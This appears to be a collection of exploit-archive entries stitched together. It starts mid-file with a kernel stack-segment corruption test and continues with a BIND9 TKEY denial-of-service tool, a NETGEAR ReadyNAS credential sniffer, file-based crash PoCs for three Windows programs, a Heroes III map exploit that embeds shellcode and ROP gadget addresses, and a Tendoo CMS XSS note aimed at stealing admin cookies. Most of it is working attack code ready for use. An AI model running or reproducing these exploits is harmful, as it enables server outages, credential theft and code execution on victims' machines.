strcpy(trapname, "SS");
else if (sig_trapno == 14)
strcpy(trapname, "PF");
else if (sig_trapno == 32)
strcpy(trapname, "IRET"); /* X86_TRAP_IRET */
else
sprintf(trapname, "%lu", sig_trapno);
printf("+ State was corrupted: %s #%s(0x%lx%s)\n",
(sig == SIGSEGV ? "SIGSEGV" : "SIGTRAP"),
trapname, (unsigned long)sig_err,
errdesc);
if (cpl0) {
printf(" CPL0\n");
cpl0 = 0;
}
if (!(ctx->uc_mcontext.gregs[REG_EFL] & X86_EFLAGS_IF))
printf(" RFLAGS = 0x%llX (interrupts disabled)\n",
(unsigned long long)ctx->uc_mcontext.gregs[REG_EFL]);
if (ctx->uc_mcontext.gregs[REG_SP] != expected_rsp)
printf(" RSP = 0x%016llX\n",
(unsigned long long)ctx->uc_mcontext.gregs[REG_SP]);
unsigned short normal_ss;
asm ("mov %%ss, %0" : "=rm" (normal_ss));
if (*ssptr(ctx) != 0x7 && *ssptr(ctx) != normal_ss)
printf(" SS = 0x%hX\n", *ssptr(ctx));
siglongjmp(jmpbuf, 1);
}
static void set_ldt(void)
{
/* Boring 16-bit data segment. */
const struct user_desc data_desc = {
.entry_number = 0,
.base_addr = 0,
.limit = 0xfffff,
.seg_32bit = 0,
.contents = 0, /* Data, expand-up */
.read_exec_only = 0,
.limit_in_pages = 0,
.seg_not_present = 0,
.useable = 0
};
if (syscall(SYS_modify_ldt, 1, &data_desc, sizeof(data_desc)) != 0)
err(1, "modify_ldt");
}
int main(int argc, char **argv)
{
static unsigned short orig_ss; /* avoid RSP references */
set_ldt();
sethandler(SIGSEGV, handler, SA_ONSTACK);
sethandler(SIGTRAP, handler, SA_ONSTACK);
stack_t stack = {
.ss_sp = altstack_data,
.ss_size = SIGSTKSZ,
};
if (sigaltstack(&stack, NULL) != 0)
err(1, "sigaltstack");
printf("If I produce no output, then either your kernel is okay\n"
"or you didn't abuse perf appropriately.\n"
"Run me under heavy perf load. For example:\n"
"perf record -g -o /dev/null -e cycles -e instructions -c 10000 %s\n", argv[0]);
if (sizeof(void *) != 4) {
printf("*** WARNING *** A 64-bit build of this exploit will not\n"
" work correctly on kernels before v4.1 due to\n"
" a signal handling bug. Build for 32-bit\n"
" or x32 instead\n");
}
sigsetjmp(jmpbuf, 1);
asm volatile ("mov %%ss, %0" : "=rm" (orig_ss));
while (1) {
#ifdef __x86_64__
asm volatile (
/* A small puzzle for the curious reader. */
"mov $2048, %%rbp \n\t"
/* Save rsp for diagnostics */
"mov %%rsp, %[expected_rsp] \n\t"
/*
* Let 'er rip.
*/
"mov %[ss], %%ss \n\t" /* begin corruption */
"movl $1000, %%edx \n\t"
"1: decl %%edx \n\t"
"jnz 1b \n\t"
"mov %%ss, %%eax \n\t" /* grab SS to display */
/* Did we enter CPL0? */
"mov %%cs, %%dx \n\t"
"testw $3, %%dx \n\t"
"jnz 2f \n\t"
"incl cpl0(%%rip) \n\t"
"leaq 3f(%%rip), %%rcx \n\t"
"movl $0x200, %%r11d \n\t"
"sysretq \n\t"
"2: \n\t"
/*
* Stop further corruption. We need to check CPL
* first because we need RPL == CPL.
*/
"mov %[orig_ss], %%ss \n\t" /* end corruption */
"subq $128, %%rsp \n\t"
"pushfq \n\t"
"testl $(1<<9),(%%rsp) \n\t"
"addq $136, %%rsp \n\t"
"jz 3f \n\t"
"cmpl %[ss], %%eax \n\t"
"je 4f \n\t"
"3: int3 \n\t"
"4: \n\t"
: [expected_rsp] "=m" (expected_rsp)
: [ss] "r" (0x7), [orig_ss] "m" (orig_ss)
: "rax", "rcx", "rdx", "rbp", "r11", "flags"
);
#else
asm volatile (
/* A small puzzle for the curious reader. */
"mov %%ebp, %%esi \n\t"
"mov $2048, %%ebp \n\t"
/* Save rsp for diagnostics */
"mov %%esp, %[expected_rsp] \n\t"
/*
* Let 'er rip.
*/
"mov %[ss], %%ss \n\t" /* begin corruption */
"movl $1000, %%edx \n\t"
"1: .byte 0xff, 0xca \n\t" /* decl %edx */
"jnz 1b \n\t"
"mov %%ss, %%eax \n\t" /* grab SS to display */
/* Did we enter CPL0? */
"mov %%cs, %%dx \n\t"
"testw $3, %%dx \n\t"
"jnz 2f \n\t"
".code64 \n\t"
"incl cpl0(%%rip) \n\t"
"leaq 3f(%%rip), %%rcx \n\t"
"movl $0x200, %%r11d \n\t"
"sysretl \n\t"
".code32 \n\t"
"2: \n\t"
/*
* Stop further corruption. We need to check CPL
* first because we need RPL == CPL.
*/
"mov %[orig_ss], %%ss \n\t" /* end corruption */
"pushf \n\t"
"testl $(1<<9),(%%esp) \n\t"
"addl $4, %%esp \n\t"
"jz 3f \n\t"
"cmpl %[ss], %%eax \n\t"
"je 4f \n\t"
"3: int3 \n\t"
"4: mov %%esi, %%ebp \n\t"
: [expected_rsp] "=m" (expected_rsp)
: [ss] "r" (0x7), [orig_ss] "m" (orig_ss)
: "eax", "ecx", "edx", "esi", "flags"
);
#endif
/*
* If we ended up with IF == 0, there's no easy way to fix
* it. Instead, make frequent syscalls to avoid hanging
* the system.
*/
syscall(0x3fffffff);
}
}
/*
PoC for BIND9 TKEY assert Dos (CVE-2015-5477)
Usage:
tkill <hostname>
What it does:
- First sends a "version" query to see if the server is up.
- Regardless of the version response, it then sends the DoS packet.
- Then it waits 5 seconds for a response. If the server crashes,
there will be no response.
Notes:
- multiple hostnames can be specified on the command-line
- IP addresses can be specified instead of hostnames
- supports IPv4 and IPv6
- runs on Linux, Mac, and Windows (cygwin or VisualStudio)
- if a hostname resolves to more than one IP, then all IPs
will be probed
About the vuln:
For control information, the "TSIG" feature allows packets to be
signed with a password. This allows slave servers to get updates
from master servers without a MitM attack (like from the NSA)
changing the data on the network.
A password can be distributed out of band, such as SSHing into
a box and editing the configuration file. Anther way is through
public-keys. That's the "TKEY" feature: it distributes new
TSIG passwords using public-keys.
When processing a TKEY packet, the code will call a function to
fetch the proper TKEY record. It looks in two places: the
"answer records" section, and the "additional records" section.
If it can't find it in the "additional", it looks in "answer".
The lookup function takes a parameter that is initially set
to NULL. During the failed lookup in the "additional" section,
it may set that parameter to a non-null value. Since a non-null
value is passed in again during the second lookup in the "answer"
section, the code crashes.
The patch was to set the variable to NULL before the second lookup.
The correct fix would simply not check to see if the parameter
was NULL to be begin with. It's an out-only parameter, so it's value
on input doesn't matter.
This is a just a "brainfart" bug that can only result in a crash
of the server. It cann't result in data-corruption or code
execution.
About this code:
To learn about writing network code, this is probably something useful
to study.
It works on both Windows and Unix (Linux, Mac, etc.). You can see where
the differences are between the two platforms, as well as the simularities.
It works on both IPv4 and IPv6. However, if you search through the code,
you'll find nothing that specifically references either version. It's
magically dual-stack. That's because it uses new functions like
"getaddrinfo()" instead of old functions like "gethostbyname()".
*/
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#ifdef WIN32
#include <winsock2.h>
#include <ws2tcpip.h>
#pragma comment(lib, "Ws2_32.lib")
#define WSA(err) (WSA##err)
#define WSAEAGAIN WSAETIMEDOUT
#else
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <errno.h>
#define WSAGetLastError() (errno)
#define WSA(err) (err)
#define closesocket(fd) close(fd)
#endif
/*
* DoS packet that will crash server
*/
static const unsigned char dospacket[] = {
0x01, 0x02, /* xid */
0x01, 0x00, /* query */
0x00, 0x01, /* one question */
0x00, 0x00, /* no answer */
0x00, 0x00, /* no authorities */
0x00, 0x01, /* one additional: must be 'additional' section to work*/
/* Query name */
0x03, 'f', 'o', 'o', 0x03, 'b', 'a', 'r', 0x00,
0x00, 249, /* TKEY record type */
0x00, 255,
/* Additional record */
0x03, 'f', 'o', 'o', 0x03, 'b', 'a', 'r', 0x00, /* name: must be same as query */
0x00, 16, /* record type: must NOT be 249/TKEY */
0x00, 255,
0, 0, 0, 0,
0, 51,
50,
'h', 't', 't', 'p', 's', ':', '/', '/',
'g', 'i', 't', 'h', 'u', 'b', '.', 'c',
'o', 'm', '/', 'r', 'o', 'b', 'e', 'r',
't', 'd', 'a', 'v', 'i', 'd', 'g', 'r',
'a', 'h', 'a', 'm', '/', 'c', 'v', 'e',
'-', '2', '0', '1', '5', '-', '5', '4',
'7', '7'
};
/*
* Packet for querying the version of the server, to test if it's up
*/
static const unsigned char versionpacket[] = {
0x03, 0x04, /* xid */
0x01, 0x00, /* query */
0x00, 0x01, /* one question */
0x00, 0x00, /* no answer */
0x00, 0x00, /* no authorities */
0x00, 0x00, /* no additional */
/* Query name */
0x07, 'v', 'e', 'r', 's', 'i', 'o', 'n', 0x04, 'b', 'i', 'n', 'd', 0x00,
0x00, 16, /* TXT */
0x00, 3, /* CHOAS */
};
/*
* YOLO BIND version.bind query
*/
int query_version(int fd, const struct addrinfo *target)
{
int bytes_received;
int i;
struct sockaddr_storage from;
socklen_t sizeof_from = sizeof(from);
char hostname[256];
unsigned char buf[2048];
int result = 0;
/*
* Query version
*/
sendto(fd, (const char*)versionpacket, sizeof(versionpacket), 0,
target->ai_addr, target->ai_addrlen);
/*
* get response
*/
again:
bytes_received = recvfrom(fd, (char*)buf, sizeof(buf), 0, (struct sockaddr*)&from, &sizeof_from);
if (bytes_received <= 0 && WSAGetLastError() == WSA(EAGAIN)) {
fprintf(stderr, "[-] timed out getting version, trying again\n");
return 0;
} else if (bytes_received <= 0) {
fprintf(stderr, "[-] unknown error receiving response: %u\n", WSAGetLastError());
return 0;
}
getnameinfo((struct sockaddr*)&from, sizeof(from), hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST);
/*
* parse response
*/
if (bytes_received < 12)
goto again;
if (buf[0] != versionpacket[0] && buf[1] != versionpacket[1])
goto again;
if ((buf[2]&0x80) != 0x80)
goto again;
/*
* Handle respoonse code
*/
switch (buf[3]&0x0F) {
case 0:
/* parse packet below */
break;
case 1:
fprintf(stderr, "[-] %s: FORMERR\n", hostname);
return 1;
case 2:
fprintf(stderr, "[-] %s: SRVFAIL\n", hostname);
return 1;
case 3:
fprintf(stderr, "[-] %s: NAMERR\n", hostname);
return 1;
case 4:
fprintf(stderr, "[-] %s: NOTIMPL\n", hostname);
return 1;
case 5:
fprintf(stderr, "[-] %s: REFUSED\n", hostname);
return 1;
default:
fprintf(stderr, "[-] %s: unknown error: %u\n", hostname, buf[3]);
return 1;
}
i = 12; /* skip header */
/*
* skip query name
*/
while (i < bytes_received) {
if (buf[i] == 0) {
i++;
break;
} else if ((buf[i] & 0xC0) == 0xC0) {
i += 2;
break;
} else {
i += buf[i] + 1;
}
}
i += 4;
/*
* process all answers
*/
while (i + 12 <= bytes_received) {
int t, c, len;
/* skip answer name */
while (i < bytes_received) {
if (buf[i] == 0) {
i++;
break;
} else if ((buf[i] & 0xC0) == 0xC0) {
i += 2;
break;
} else {
i += buf[i] + 1;
}
}
/* extract resource-recorder header */
if (i + 10 > bytes_received)
break;
t = buf[i+0]<<8 | buf[i+1];
c = buf[i+2]<<8 | buf[i+3];
len = buf[i+8]<<8 | buf[i+9];
i += 10;
/* verify TXT CHAOS */
if (t != 16 || c != 3) {
i += len;
continue;
}
/* fix len */
if (len > bytes_received - i)
len = bytes_received - i;
/* print the hostname */
fprintf(stderr, "[+] %s: ", hostname);
/* print the strings */
{
int j = i;
i += len;
while (j < i) {
int len2 = buf[j];
int k;
j++;
if (len2 > bytes_received - len2)
len2 = bytes_received - len2;
fprintf(stderr, "\"");
for (k=j; k<j+len2; k++) {
if (buf[k] == '\\')
fprintf(stderr, "\\");
else if (!isprint(buf[k]))
fprintf(stderr, "\\x%02x", buf[k]);
else
fprintf(stderr, "%c", buf[k]);
}
j = k;
fprintf(stderr, "\" ");
}
fprintf(stderr, "\n");
}
result = 1;
}
return result;
}
/*
* Send the DoS packet
*/
void probe(const struct addrinfo *target)
{
int fd;
int x;
int i;
char hostname[256];
char buf[2048];
struct sockaddr_storage from;
socklen_t sizeof_from = sizeof(from);
/*
* Print status
*/
getnameinfo(target->ai_addr, target->ai_addrlen, hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST);
fprintf(stderr, "[+] %s: Probing...\n", hostname);
/*
* Create a socket
*/
fd = socket(target->ai_family, SOCK_DGRAM, 0);
if (fd <= 0) {
fprintf(stderr, "[-] failed: socket(): %u\n", WSAGetLastError());
return;
}
/*
* Set the timeout to 5-seconds
*/
{
#ifdef WIN32
int milliseconds = 5000;
x = setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, (char*)&milliseconds, sizeof(milliseconds));
#else
struct timeval t;
t.tv_sec = 5;
t.tv_usec = 0;
x = setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, (char*)&t, sizeof(t));
#endif
if (x != 0) {
fprintf(stderr, "[-] err setting recv timeout: %u\n", WSAGetLastError());
}
}
/*
* First, query the server to grab its version, but also to see it's up
*/
fprintf(stderr, "[+] Querying version...\n");
for (i=0; i<3; i++) {
if (query_version(fd, target))
break;
if (i == 2) {
fprintf(stderr, "[-] Can't query server, is it crashed already?\n");
fprintf(stderr, "[-] Sending exploit anyway.\n");
}
}
/*****************
* SEND DoS PACKET
*****************/
fprintf(stderr, "[+] Sending DoS packet...\n");
sendto(fd, (const char*)dospacket, sizeof(dospacket), 0, target->ai_addr, target->ai_addrlen);
/* Grab response */
fprintf(stderr, "[+] Waiting 5-sec for response...\n");
for (;;) {
x = recvfrom(fd, (char*)buf, sizeof(buf), 0, (struct sockaddr*)&from, &sizeof_from);
if (x <= 0 && WSAGetLastError() == WSA(EAGAIN)) {
fprintf(stderr, "[+] timed out, probably crashed\n");
break;
} else if (x <= 0) {
fprintf(stderr, "[-] unknown error receiving response: %u\n", WSAGetLastError());
break;;
}
if (x > 2 && (buf[0] != dospacket[0] || buf[1] != dospacket[1]))
continue;
getnameinfo((struct sockaddr*)&from, sizeof(from), hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST);
fprintf(stderr, "[-] %s: got response, so probably not vulnerable\n", hostname);
break;
}
closesocket(fd);
}
/*
* The main function just parses the arguments and looks up IP addrsses
* before calling the "probe" function to actually exploit the targets
*/
int main(int argc, char *argv[])
{
int i;
#ifdef WIN32
{WSADATA x; WSAStartup(0x101, &x);}
#endif
fprintf(stderr, "--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---\n");
if (argc <= 1) {
fprintf(stderr, "[-] no host specified\n");
fprintf(stderr, "usage:\n tkill <hostname>\n");
return -1;
}
/*
* Query all targets specified on the command line
*/
for (i=1; i<argc; i++) {
const char *hostname = argv[i];
struct addrinfo *info;
struct addrinfo *target;
char oldtarget[256] = "";
int x;
/*
* Lookup the name of the target
*/
fprintf(stderr, "[+] %s: Resolving to IP address\n", hostname);
x = getaddrinfo(hostname, "53", 0, &info);
if (x != 0) {
fprintf(stderr, "[-] %s: failed: %s\n", hostname, gai_strerror(x));
continue;
}
if (info->ai_next) {
fprintf(stderr, "[+] %s: Resolved to multiple IPs (NOTE)\n", hostname);
}
/*
* Since a name can return multiple IP addresses,
* send a probe to all the results
*/
for (target=info; target; target = target->ai_next) {
char newtarget[256];
/* bah, stupid bug in Linux gets the same target multiple
* times */
getnameinfo(target->ai_addr, target->ai_addrlen, newtarget, sizeof(newtarget), NULL, 0, NI_NUMERICHOST);
if (strcmp(newtarget, oldtarget) == 0)
continue;
memcpy(oldtarget, newtarget, sizeof(oldtarget));
probe(target);
printf("\n");
}
/*
* Cleanup
*/
freeaddrinfo(info);
}
return 0;
}
#!/usr/bin/env python
#
# Exploit Title: NETGEAR ReadyNAS LAN /dbbroker Credential Stealing
# Date: 25/07/2015
# Exploit Author: St0rn
# Vendor Homepage: www.netgear.fr/business/products/storage/readynas
# Software Link: apps.readynas.com/pages/?page_id=143
# Version: Firmware 6.2.4
#
### Import ###
from scapy.all import *
from sys import argv,exit
from os import system
### Clear Function ###
def clear():
system("/usr/bin/clear")
### Function to get and decode credential ###
def getReadyNASCredz(p):
if p.haslayer(TCP) and p[IP].dst==argv[2]:
if p.haslayer(Raw):
if "POST /dbbroker" in p[Raw].load:
tmp=p[Raw].load
credz=tmp.split("\r\n")
for i in credz:
if "Authorization: Basic" in i:
print "-----------------".center(80)
print i.split(" ")[2].decode("base64").center(80)
### Main ###
if __name__ == '__main__':
clear()
if len(argv)<3:
print "Usage: %s [device] [NAS_IP]" %(argv[0])
exit(0)
else:
print "\n"
print "#################".center(80)
print "#G0 t0 G3t Cr3dZ#".center(80)
print "#################\n".center(80)
sniff(prn=getReadyNASCredz,iface=argv[1])
#!/usr/bin/env python
# Title : Acunetix Web Vulnerability Scanner 9.5 - Crash Proof Of Concept
# Website : https://www.acunetix.com
# Tested : win 7 / win 8.1 / win vista
#
#
# Author : Hadi Zomorodi Monavar
# Email : zomorodihadi@gmail.com
#
# 1 . run python code : python poc.py
# 2 . open hadi.txt and copy content to clipboard
# 3 . open "Acunetix Web Vulnerability Scanner 9.5"
# 4 . from Tools Explorer --> subdomain scanner
# 5 . Paste ClipBoard on "Domain"
# 6 . Click start
# 7 . Crashed ;)
crash = "\x41"*9000 #B0F
file = open("hadi.txt", "w")
file.write(crash)
file.close()
#!/usr/bin/python
# coding: utf-8
#[+] Author: SATHISH ARTHAR
#[+] Exploit Title: T-Mobile Internet Manager Memory Corruption PoC
#[+] Date: 30-07-2015
#[+] Category: DoS/PoC
#[+] Tested on: WinXp/Windows7/windows8
#[+] Vendor: https://www.t-mobile.de/meinhandy/1,25412,19349-_,00.html
#[+] Download: https://www.t-mobile.de/downloads/neu/winui.zip
#[+] Sites: sathisharthars.wordpress.com
#[+] Twitter: @sathisharthars
#[+] Thanks: offensive security (@offsectraining)
print"###########################################################"
print"# Title: T-Mobile Internet Manager Memory Corruption PoC #"
print"# Author: SATHISH ARTHAR #"
print"# Category: DoS/PoC # "
print"###########################################################"
print"Copy the content of CRASH.TXT in create new contacts and paste
it in Name field"
print" contacts -----> create new -----> Name ----> paste it "
crash= "A" * 2000
filename = "CRASH.TXT"
file = open(filename , "w")
file.write(crash)
print "\n Files Created!\n"
file.close()
#!/usr/bin/perl -w
# Title : KMPlayer 3.9.x - Crash Proof Of Concept
# Company : http://www.kmplayer.com
# Tested : Windows 7 / Windows 8.1
#
#
# Author : Peyman Motevalli Manesh
# Linkedin : https://ir.linkedin.com/in/peymanmotevalli
# E-Mail : me[at]PDPnetwork[dot]ir
# Website : www.PDPnetwork.ir
# FaceBook : https://www.facebook.com/Peyman.Motevalli
#
#
# 1 . run perl code : perl km.pl
# 2 . open "kmplayer"
# 3 . Load Subtitle (Peyman.srt)
# 4 . Crashed
$eheader="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x46\x14";
$h="\x42"x9850;
$poc="\x41"x500000;
$poc="$h$poc$eheader";
open (Peyman, '>Peyman.srt');
for ($i=1;$i<=4;$i++){
print Peyman "$i\n00:00:01,800 --> 00:00:05,500\n";
print Peyman $poc;
}
close (Peyman);
/*
# Exploit Title : Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution
# Date : 2015-07-29
# Exploit Author : John AAkerblom, Pierre Lindblad
# Website: http://h3minternals.net
# Vendor Homepage : 3do.com (defunct), https://sites.google.com/site/heroes3hd/
# Version : 4.0.0.0 AND HoMM 3 HD 3.808 build 9
# Tested on : Windows XP, Windows 8.1
# Category: exploits
# Description:
This PoC embeds an exploit into an uncompressed map file (.h3m) for Heroes
of Might and Magic III. Once the map is started in-game, a buffer overflow
occuring when loading object sprite names leads to shellcode execution.
Only basic arbitrary code execution is covered in this PoC but is possible to
craft an exploit that lets the game continue normally after the shellcode has
been executed. Using extensive knowledge of the .h3m format, it is even
possible to create a map file that loads like normal in the game's map editor
(which lacks the vulnerability) but stealthily executes shellcode when opened
in-game.
*/
#include <string.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
/* Calc payload: https://code.google.com/p/win-exec-calc-shellcode/
0xEBFE added at end. Note that a NULL-less payload is not actually needed
Copyright (c) 2009-2014 Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
and Peter Ferrie <peter.ferrie@gmail.com>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of the copyright holder nor the names of the
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */
static const uint8_t CALC_PAYLOAD[] = {
0x31, 0xD2, 0x52, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 0x59, 0x52,
0x51, 0x64, 0x8B, 0x72, 0x30, 0x8B, 0x76, 0x0C, 0x8B, 0x76, 0x0C,
0xAD, 0x8B, 0x30, 0x8B, 0x7E, 0x18, 0x8B, 0x5F, 0x3C, 0x8B, 0x5C,
0x1F, 0x78, 0x8B, 0x74, 0x1F, 0x20, 0x01, 0xFE, 0x8B, 0x54, 0x1F,
0x24, 0x0F, 0xB7, 0x2C, 0x17, 0x42, 0x42, 0xAD, 0x81, 0x3C, 0x07,
0x57, 0x69, 0x6E, 0x45, 0x75, 0xF0, 0x8B, 0x74, 0x1F, 0x1C, 0x01,
0xFE, 0x03, 0x3C, 0xAE, 0xFF, 0xD7, 0xEB, 0xFE
};
/*
* The memmem() function finds the start of the first occurrence of the
* substring 'needle' of length 'nlen' in the memory area 'haystack' of
* length 'hlen'.
*
* The return value is a pointer to the beginning of the sub-string, or
* NULL if the substring is not found.
*
* Original author: caf, http://stackoverflow.com/a/2188951
*/
static uint8_t *_memmem(uint8_t *haystack, size_t hlen, uint8_t *needle, size_t nlen)
{
uint8_t needle_first;
uint8_t *p = haystack;
size_t plen = hlen;
if (!nlen)
return NULL;
needle_first = *(uint8_t *)needle;
while (plen >= nlen && (p = memchr(p, needle_first, plen - nlen + 1)))
{
if (!memcmp(p, needle, nlen))
return p;
p++;
plen = hlen - (p - haystack);
}
return NULL;
}
#ifdef _MSC_VER
#pragma warning(disable:4996) // M$ fopen so unsafe
#endif
#pragma pack(push, 1)
// exploit struct
// .h3m files contain an array of object attributes - OA - in which each
// entry starts with a string length and then a string for an object sprite.
// This exploit overflows the stack with a malicious sprite name.
struct exploit_oa_t
{
uint32_t size; // size of the rest of this struct, including shellcode
// The rest of the struct is the sprite name for the OA, <size> bytes of
// which an CALL ESP-gadget address is placed so that it overwrites the
// return address, when ESP is called shellcode2 will be executed. An
// additional 2 "anticrash" gadgets are needed so the game does not crash
// before returning to the CALL ESP-gadget.
uint8_t nullbyte; // Must be 0x00, terminating sprite name
uint8_t overwritten[6]; // Overwritten by game
uint8_t shellcode1[121]; // Mostly not used, some is overwritten
uint32_t call_esp_gadget; // Address of CALL [ESP], for saved eip on stack
// anticrash_gadget1, needs to pass the following code down to final JMP:
//
// MOV EAX, DWORD PTR DS : [ESI + 4] ; [anticrash_gadget1 + 4]
// XOR EBX, EBX
// CMP EAX, EBX
// JE SHORT <crash spot> ; JMP to crash if EAX is 0
// MOV CL, BYTE PTR DS : [EAX - 1]
// CMP CL, BL
// JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0
// CMP CL, 0FF
// JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0xFF
// CPU Disasm
// CMP EDI, EBX
// JNE <good spot> ; JMP to good spot. Always occurs if we get this far
uint32_t anticrash_gadget1;
// anticrash_gadget2, needs to return out of the following call (tricky):
//
// MOV EAX, DWORD PTR DS : [ECX] ; [anticrash_gadget2]
// CALL DWORD PTR DS : [EAX + 4] ; [[anticrash_gadget2] + 4]
uint32_t anticrash_gadget2;
// Here at 144 bytes into this struct comes the shellcode that will be
// executed. For the game to survive, it is wise to use this only for a
// short jmp as doing so means only 2 values have to be restored on the
// stack. Namely: original return address and format value of the h3m.
// This PoC simply puts shellcode here, meaning the game cannot continue
// after shellcode execution.
uint8_t shellcode2[];
};
struct offsets_t
{
uint32_t call_esp_gadget;
uint32_t anticrash_gadget1;
uint32_t anticrash_gadget2;
};
#pragma pack(pop)
static const struct offsets_t * const TARGET_OFFSETS[] = {
(struct offsets_t *)"\x87\xFF\x4E\x00\xD4\x97\x44\x00\x30\x64\x6A\x00",
(struct offsets_t *)"\x0F\x0C\x58\x00\x48\x6A\x45\x00\x30\x68\x6A\x00"
};
#define TARGET_DESCS " 1: H3 Complete 4.0.0.0 [Heroes3.exe 78956DFAB3EB8DDF29F6A84CF7AD01EE]\n" \
" 2: HD Mod 3.808 build 9 [Heroes3 HD.exe 56614D31CC6F077C2D511E6AF5619280]"
#define MAX_TARGET 2
// Name of a sprite present in all maps, this is overwritten with exploit
#define NEEDLE "AVWmrnd0.def"
int pack_h3m(FILE *h3m_f, const struct offsets_t * const ofs, const uint8_t *payload, long payload_size)
{
uint8_t *buf = NULL;
uint8_t *p = NULL;
long h3m_size = 0;
long bytes = 0;
struct exploit_oa_t *exp = NULL;
// Read entire h3m file into memory
fseek(h3m_f, 0, SEEK_END);
h3m_size = ftell(h3m_f);
rewind(h3m_f);
buf = malloc(h3m_size);
if (buf == NULL) {
puts("[!] Failed to allocate memory");
return 1;
}
bytes = fread(buf, sizeof(uint8_t), h3m_size, h3m_f);
if (bytes != h3m_size) {
free(buf);
puts("[!] Failed to read all bytes");
return 1;
}
// Find game object array in .h3m, where we will overwrite the first entry
p = _memmem(buf, h3m_size, (uint8_t *)NEEDLE, sizeof(NEEDLE) - 1);
if (p == NULL) {
puts("[!] Failed to find needle \"" NEEDLE "\" in file. Make sure it is an uncompressed .h3m");
free(buf);
return 1;
}
// Move back 4 bytes from sprite name, pointing to the size of the sprite name
p -= 4;
// Overwrite the first game object with exploit
exp = (struct exploit_oa_t *)p;
exp->size = sizeof(*exp) - sizeof(exp->size) + payload_size;
exp->nullbyte = 0;
exp->call_esp_gadget = ofs->call_esp_gadget;
exp->anticrash_gadget1 = ofs->anticrash_gadget1;
exp->anticrash_gadget2 = ofs->anticrash_gadget2;
memcpy(exp->shellcode2, payload, payload_size);
// Write entire file from memory and cleanup
rewind(h3m_f);
bytes = fwrite(buf, sizeof(uint8_t), h3m_size, h3m_f);
if (bytes != h3m_size) {
free(buf);
puts("[!] Failed to write all bytes");
return 1;
}
free(buf);
return 0;
}
static void _print_usage(void)
{
puts("Usage: h3mpacker <uncompressed h3m filename> <target #>");
puts("Available targets:");
puts(TARGET_DESCS);
puts("Examples:");
puts(" h3mpacker Arrogance.h3m 1");
puts(" h3mpacker Deluge.h3m 2");
}
int main(int argc, char **argv)
{
FILE *h3m_f = NULL;
int ret = 0;
int target;
if (argc != 3) {
_print_usage();
return 1;
}
h3m_f = fopen(argv[1], "rb+");
target = strtoul(argv[2], NULL, 0);
if (h3m_f == NULL || target < 1 || target > MAX_TARGET) {
if (h3m_f != NULL)
fclose(h3m_f);
_print_usage();
return 1;
}
ret = pack_h3m(h3m_f, TARGET_OFFSETS[target-1], CALC_PAYLOAD, sizeof(CALC_PAYLOAD));
fclose(h3m_f);
if (ret != 0)
return ret;
printf("[+] Payload embedded into h3m file %s\n", argv[1]);
return 0;
}
# Exploit Title: Tendoo CMS Stored And Reflected Xss Vulnerability
# Google Dork: N/A
# Date: 28/7/2015
# Exploit Author: Arash Khazaei
# Vendor Homepage: http://tendoo.org/
# Software Link: http://sourceforge.net/projects/tendoo-cms/
# Version: 1.3
# Tested on: Kali , Windows
# CVE : N/A
# Contact : 0xclay@gmail.com
######################
Introduction :
a Stored And a Reflected XSS Vulnerability In Profile Area In Tendoo CMS
Make CMS Vulnerable And Can Be Used For Stealing Admin Cookies And ....... .
######################
Stored Xss In http://localhost/tendoo/index.php/account/update In First
Name and Last Name Inputs
Excute Java Script Codes And If Admin Or Any Body Come In Attacker Profile
When First Name And Last Name Loads
JavaScripts Code Will Be Excuted
POC :
https://i.leetfil.es/e992ad2d.jpg
Discovered By Arash Khazaei